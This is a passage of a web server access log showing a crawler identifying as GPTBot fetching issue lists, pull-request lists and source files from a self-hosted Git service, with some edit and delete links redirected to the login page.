AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:06:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9964] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&state=open&type=all" -[17/Feb/2026:19:06:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10135] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&state=all&type=all" -[17/Feb/2026:19:06:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:06:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:06:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:06:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:06:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10140] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:06:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md?display=rendered" [Client 74.7.227.38] [Length 11253] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" -[17/Feb/2026:19:06:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:06:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:06:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:06:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 515] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" -[17/Feb/2026:19:06:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 10531] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" -[17/Feb/2026:19:06:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" -[17/Feb/2026:19:06:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" -[17/Feb/2026:19:06:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" -[17/Feb/2026:19:06:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" -[17/Feb/2026:19:06:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 10920] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:19:06:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12282] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:19:06:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:06:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:06:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11170] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:19:06:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&state=open&type=all" -[17/Feb/2026:19:06:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10145] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&state=all&type=all" -[17/Feb/2026:19:06:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:06:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" -[17/Feb/2026:19:06:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" -[17/Feb/2026:19:06:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15661] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:06:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:06:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:06:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:06:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:06:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:07:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:07:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:07:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=open&type=all" -[17/Feb/2026:19:07:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:07:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:07:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=open&type=all" -[17/Feb/2026:19:07:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:07:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets?display=source" [Client 74.7.227.38] [Length 11602] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" -[17/Feb/2026:19:07:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props?display=source" [Client 74.7.227.38] [Length 11785] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" -[17/Feb/2026:19:07:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:19:07:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:19:07:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:19:07:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11037] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:19:07:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:07:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:07:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10262] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:07:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:07:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:07:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:07:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:07:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:07:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:07:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=latest&state=closed&type=all" -[17/Feb/2026:19:07:12 